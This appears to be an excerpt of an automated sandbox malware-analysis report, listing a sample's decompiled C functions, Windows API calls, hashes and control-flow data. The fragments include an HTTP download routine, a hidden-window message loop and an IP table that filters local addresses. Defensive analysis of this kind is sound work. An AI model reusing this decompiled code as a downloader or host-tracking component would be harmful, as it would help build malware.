                                                                                                                                                                                                                                                                                    0x0040e17c
                                                                                                                                                                                                                                                                                    0x0040e179
                                                                                                                                                                                                                                                                                    0x0040e146
                                                                                                                                                                                                                                                                                    0x0040e133
                                                                                                                                                                                                                                                                                    0x0040e182
                                                                                                                                                                                                                                                                                    0x0040e188
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e10b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000020,0040B950,?,0040EC84), ref: 0040E0FA
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E126
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E13E
                                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0040E16C
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E17C
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000020,?,0040EC84), ref: 0040E194
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0040EC84), ref: 0040E19E
                                                                                                                                                                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040EC84), ref: 0040E1BB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E1E4
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E1EA
                                                                                                                                                                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 0040E1F0
                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040EC84), ref: 0040E206
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                                                                                                                                                                    • Opcode ID: 24bc7e855fdf49573c30e595b41f6c55b623b0266ed7625da85c1981aca9c43c
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e090b2b2d95b5b5db58c8e8021d4e4c0217c2d5e17fa086addfc70fe82b675d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24bc7e855fdf49573c30e595b41f6c55b623b0266ed7625da85c1981aca9c43c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E319871500705BBD7109F71EC48F97B7A8BF09300F048A2EE959A7691C778F9A4CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E004043F0() {
                                                                                                                                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                                                                                                    				struct _WNDCLASSEXW _v84;
                                                                                                                                                                                                                                                                                    				short _v596;
                                                                                                                                                                                                                                                                                    				unsigned int _t20;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_v84.cbSize = 0;
                                                                                                                                                                                                                                                                                    					memset( &(_v84.style), 0, 0x2c);
                                                                                                                                                                                                                                                                                    					_t40 = _t39 + 0xc;
                                                                                                                                                                                                                                                                                    					_v84.cbSize = 0x30;
                                                                                                                                                                                                                                                                                    					_v84.lpfnWndProc = E004041A0;
                                                                                                                                                                                                                                                                                    					_v84.hInstance = GetModuleHandleW(0);
                                                                                                                                                                                                                                                                                    					_v84.lpszClassName =  &_v596;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						Sleep(1);
                                                                                                                                                                                                                                                                                    						_t20 = GetTickCount();
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                                                                                                                                                                                                                    						_t40 = _t40 + 0x10;
                                                                                                                                                                                                                                                                                    					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                                                                                                                                                                                                                    					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                                                                                                                                                                                                                    							TranslateMessage( &_v36);
                                                                                                                                                                                                                                                                                    							DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    				} while (0 != 0);
                                                                                                                                                                                                                                                                                    				ExitThread(0);
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x004043f9
                                                                                                                                                                                                                                                                                    0x004043f9
                                                                                                                                                                                                                                                                                    0x00404408
                                                                                                                                                                                                                                                                                    0x0040440d
                                                                                                                                                                                                                                                                                    0x00404410
                                                                                                                                                                                                                                                                                    0x00404417
                                                                                                                                                                                                                                                                                    0x00404426
                                                                                                                                                                                                                                                                                    0x0040442f
                                                                                                                                                                                                                                                                                    0x00404432
                                                                                                                                                                                                                                                                                    0x00404434
                                                                                                                                                                                                                                                                                    0x0040443a
                                                                                                                                                                                                                                                                                    0x00404456
                                                                                                                                                                                                                                                                                    0x0040445c
                                                                                                                                                                                                                                                                                    0x0040446c
                                                                                                                                                                                                                                                                                    0x00404492
                                                                                                                                                                                                                                                                                    0x00404499
                                                                                                                                                                                                                                                                                    0x0040449d
                                                                                                                                                                                                                                                                                    0x004044b5
                                                                                                                                                                                                                                                                                    0x004044bf
                                                                                                                                                                                                                                                                                    0x004044bf
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040449d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004044c7
                                                                                                                                                                                                                                                                                    0x004044c7
                                                                                                                                                                                                                                                                                    0x004044d1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                                                    • String ID: %x%X$0
                                                                                                                                                                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                                                    • Opcode ID: fefae300a6ae166907af6779e4e4d81ad735c504abc0138177021c7cc3709374
                                                                                                                                                                                                                                                                                    • Instruction ID: 3e2b717ade092063a9efcdadcacb4b05de8fa546afe9c034d67f52ff400308d4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fefae300a6ae166907af6779e4e4d81ad735c504abc0138177021c7cc3709374
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 732121B0940318ABEB109BE0DC4DFEE7B78BB48701F548529F601B61D0DBB995448B69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 581 40c260-40c2fb memset InternetCrackUrlA InternetOpenA 582 40c301-40c334 InternetConnectA 581->582 583 40c477-40c480 581->583 584 40c46a-40c471 InternetCloseHandle 582->584 585 40c33a-40c36a HttpOpenRequestA 582->585 584->583 586 40c370-40c387 HttpSendRequestA 585->586 587 40c45d-40c464 InternetCloseHandle 585->587 588 40c450-40c457 InternetCloseHandle 586->588 589 40c38d-40c391 586->589 587->584 588->587 590 40c446 589->590 591 40c397 589->591 590->588 592 40c3a1-40c3a8 591->592 593 40c439-40c444 592->593 594 40c3ae-40c3d0 InternetReadFile 592->594 593->588 595 40c3d2-40c3d9 594->595 596 40c3db 594->596 595->596 597 40c3dd-40c434 call 408b60 memcpy 595->597 596->593 597->592
                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040C260(char* _a4, char** _a8) {
                                                                                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                                                                                    				char _v772;
                                                                                                                                                                                                                                                                                    				long _v776;
                                                                                                                                                                                                                                                                                    				void* _v780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v792;
                                                                                                                                                                                                                                                                                    				char* _v796;
                                                                                                                                                                                                                                                                                    				signed short _v816;
                                                                                                                                                                                                                                                                                    				intOrPtr _v820;
                                                                                                                                                                                                                                                                                    				char* _v824;
                                                                                                                                                                                                                                                                                    				void _v836;
                                                                                                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                                                                                                    				void* _v844;
                                                                                                                                                                                                                                                                                    				void* _v848;
                                                                                                                                                                                                                                                                                    				char* _v852;
                                                                                                                                                                                                                                                                                    				void _v1876;
                                                                                                                                                                                                                                                                                    				long _v1880;
                                                                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v776 = 0;
                                                                                                                                                                                                                                                                                    				_v840 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                                    				_t92 = _t91 + 0xc;
                                                                                                                                                                                                                                                                                    				_v840 = 0x3c;
                                                                                                                                                                                                                                                                                    				_v824 =  &_v260;
                                                                                                                                                                                                                                                                                    				_v820 = 0x100;
                                                                                                                                                                                                                                                                                    				_v796 =  &_v772;
                                                                                                                                                                                                                                                                                    				_v792 = 0x200;
                                                                                                                                                                                                                                                                                    				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                                    				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v780 != 0) {
                                                                                                                                                                                                                                                                                    					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v844 != 0) {
                                                                                                                                                                                                                                                                                    						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v848 != 0) {
                                                                                                                                                                                                                                                                                    							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                                                                                                                    								if(_a8 == 0) {
                                                                                                                                                                                                                                                                                    									_v776 = 1;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v852 = 0;
                                                                                                                                                                                                                                                                                    									while(1 != 0) {
                                                                                                                                                                                                                                                                                    										_t87 = _v848;
                                                                                                                                                                                                                                                                                    										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                                                                                                                                                                                                                    											_v776 = E00408B60(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                                                                                                                                                                                                                    											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                                                                                                                                                                                                                    											_t92 = _t92 + 0x14;
                                                                                                                                                                                                                                                                                    											_v852 =  &(_v852[_v1880]);
                                                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									 *_a8 = _v852;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v776;
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x0040c269
                                                                                                                                                                                                                                                                                    0x0040c273
                                                                                                                                                                                                                                                                                    0x0040c288
                                                                                                                                                                                                                                                                                    0x0040c28d
                                                                                                                                                                                                                                                                                    0x0040c290
                                                                                                                                                                                                                                                                                    0x0040c2a0
                                                                                                                                                                                                                                                                                    0x0040c2a6
                                                                                                                                                                                                                                                                                    0x0040c2b6
                                                                                                                                                                                                                                                                                    0x0040c2bc
                                                                                                                                                                                                                                                                                    0x0040c2d8
                                                                                                                                                                                                                                                                                    0x0040c2ee
                                                                                                                                                                                                                                                                                    0x0040c2fb
                                                                                                                                                                                                                                                                                    0x0040c327
                                                                                                                                                                                                                                                                                    0x0040c334
                                                                                                                                                                                                                                                                                    0x0040c35d
                                                                                                                                                                                                                                                                                    0x0040c36a
                                                                                                                                                                                                                                                                                    0x0040c387
                                                                                                                                                                                                                                                                                    0x0040c391
                                                                                                                                                                                                                                                                                    0x0040c446
                                                                                                                                                                                                                                                                                    0x0040c397
                                                                                                                                                                                                                                                                                    0x0040c397
                                                                                                                                                                                                                                                                                    0x0040c3a1
                                                                                                                                                                                                                                                                                    0x0040c3c1
                                                                                                                                                                                                                                                                                    0x0040c3d0
                                                                                                                                                                                                                                                                                    0x0040c3f9
                                                                                                                                                                                                                                                                                    0x0040c41a
                                                                                                                                                                                                                                                                                    0x0040c41f
                                                                                                                                                                                                                                                                                    0x0040c42e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c42e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c3d0
                                                                                                                                                                                                                                                                                    0x0040c442
                                                                                                                                                                                                                                                                                    0x0040c442
                                                                                                                                                                                                                                                                                    0x0040c391
                                                                                                                                                                                                                                                                                    0x0040c457
                                                                                                                                                                                                                                                                                    0x0040c457
                                                                                                                                                                                                                                                                                    0x0040c464
                                                                                                                                                                                                                                                                                    0x0040c464
                                                                                                                                                                                                                                                                                    0x0040c471
                                                                                                                                                                                                                                                                                    0x0040c471
                                                                                                                                                                                                                                                                                    0x0040c480

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040C288
                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(0040D079,00000000,10000000,0000003C), ref: 0040C2D8
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C2E8
                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C321
                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C357
                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C37F
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C3C8
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040C41A
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C457
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C464
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C471
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID: <$GET
                                                                                                                                                                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                                                    • Opcode ID: dab37fe1cf5ad5345423841208ea45a88af8b8a36c3041dfe8d9034034847e97
                                                                                                                                                                                                                                                                                    • Instruction ID: fb11e20dfced737966d96b67562c2227f08ee783dca279ae1717ab20ae365a52
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dab37fe1cf5ad5345423841208ea45a88af8b8a36c3041dfe8d9034034847e97
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44513EB1941228ABDB36CB50CC95BE973BCBB44705F0081E9A60DAA2C0D7B96FC4CF54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409A30(signed int _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                                                                                    				signed char _v5;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				signed char _t50;
                                                                                                                                                                                                                                                                                    				char* _t52;
                                                                                                                                                                                                                                                                                    				char* _t54;
                                                                                                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    				char* _t68;
                                                                                                                                                                                                                                                                                    				char* _t72;
                                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                                    				char* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                                                                    				char* _t95;
                                                                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = E00409770(_a4);
                                                                                                                                                                                                                                                                                    				_t98 = _t97 + 4;
                                                                                                                                                                                                                                                                                    				_t74 = _t50 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				if((_t50 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    					_t52 = strstr(E004094E0(_t74, _a4), "127.");
                                                                                                                                                                                                                                                                                    					_t100 = _t98 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t52;
                                                                                                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						_t54 = strstr(E004094E0(_t74, _a4), "10.");
                                                                                                                                                                                                                                                                                    						_t102 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t54;
                                                                                                                                                                                                                                                                                    						if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                                                                    							EnterCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    							_v5 = 0;
                                                                                                                                                                                                                                                                                    							_v12 = 0;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								__eflags = _v12 -  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t93 =  *((intOrPtr*)(0x416e30 + _v12 * 4));
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t93 + 4)) - _a4;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t93 + 4)) != _a4) {
                                                                                                                                                                                                                                                                                    									_t95 = _v12 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t95;
                                                                                                                                                                                                                                                                                    									_v12 = _t95;
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t65 = E0040BE60();
                                                                                                                                                                                                                                                                                    								_t55 = _t65 - _a8;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v12 * 4)) + 8)) = _t65 - _a8;
                                                                                                                                                                                                                                                                                    								_v5 = 1;
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							E00409980(_t55);
                                                                                                                                                                                                                                                                                    							_t57 = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                                    							__eflags = _t57;
                                                                                                                                                                                                                                                                                    							if(_t57 != 0) {
                                                                                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                                                                                    								LeaveCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    								return _t57;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v13 = 0;
                                                                                                                                                                                                                                                                                    							__eflags =  *0x416e2c - 0x200;
                                                                                                                                                                                                                                                                                    							if( *0x416e2c == 0x200) {
                                                                                                                                                                                                                                                                                    								_v13 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t57 = E00408B00(0xc);
                                                                                                                                                                                                                                                                                    							_v20 = _t57;
                                                                                                                                                                                                                                                                                    							__eflags = _v20;
                                                                                                                                                                                                                                                                                    							if(_v20 == 0) {
                                                                                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v20 + 8)) = E0040BE60() - _a8;
                                                                                                                                                                                                                                                                                    								__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                                    								if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									_t89 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    									_t60 = _v20;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(0x416e30 + _t89 * 4)) = _v20;
                                                                                                                                                                                                                                                                                    									_t77 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    									_t78 = _t77 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t78;
                                                                                                                                                                                                                                                                                    									 *0x416e2c = _t78;
                                                                                                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                                                                                                    									_t57 = E00409980(_t60);
                                                                                                                                                                                                                                                                                    									__eflags = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                                                    									if((_a12 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    										_t57 = E00409660(_t57);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L27;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									L21:
                                                                                                                                                                                                                                                                                    									_t61 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    									__eflags =  *(0x416e2c[_t61]);
                                                                                                                                                                                                                                                                                    									if( *(0x416e2c[_t61]) == 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									Sleep(1);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t91 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								 *(0x416e2c[_t91]) = 1;
                                                                                                                                                                                                                                                                                    								_t80 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								E00408C70(0x416e2c[_t80]);
                                                                                                                                                                                                                                                                                    								_t60 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								0x416e2c[_t60] = _v20;
                                                                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t68 = strstr(E004094E0(_t74, _a4), ".10");
                                                                                                                                                                                                                                                                                    						_t106 = _t102 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t68;
                                                                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							return _t68;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t68 = strstr(E004094E0(_a4, _a4), ".10.");
                                                                                                                                                                                                                                                                                    						_t102 = _t106 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t68;
                                                                                                                                                                                                                                                                                    						if(_t68 != 0) {
                                                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t72 = strstr(E004094E0(_t74, _a4), ".127");
                                                                                                                                                                                                                                                                                    					_t109 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t72;
                                                                                                                                                                                                                                                                                    					if(_t72 == 0) {
                                                                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                                                                    						return _t72;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t74 = _a4;
                                                                                                                                                                                                                                                                                    					_t72 = strstr(E004094E0(_a4, _a4), ".127.");
                                                                                                                                                                                                                                                                                    					_t100 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t72;
                                                                                                                                                                                                                                                                                    					if(_t72 != 0) {
                                                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t50;
                                                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                                                    0x00409a3a
                                                                                                                                                                                                                                                                                    0x00409a3f
                                                                                                                                                                                                                                                                                    0x00409a42
                                                                                                                                                                                                                                                                                    0x00409a47
                                                                                                                                                                                                                                                                                    0x00409a60
                                                                                                                                                                                                                                                                                    0x00409a65
                                                                                                                                                                                                                                                                                    0x00409a68
                                                                                                                                                                                                                                                                                    0x00409a6a
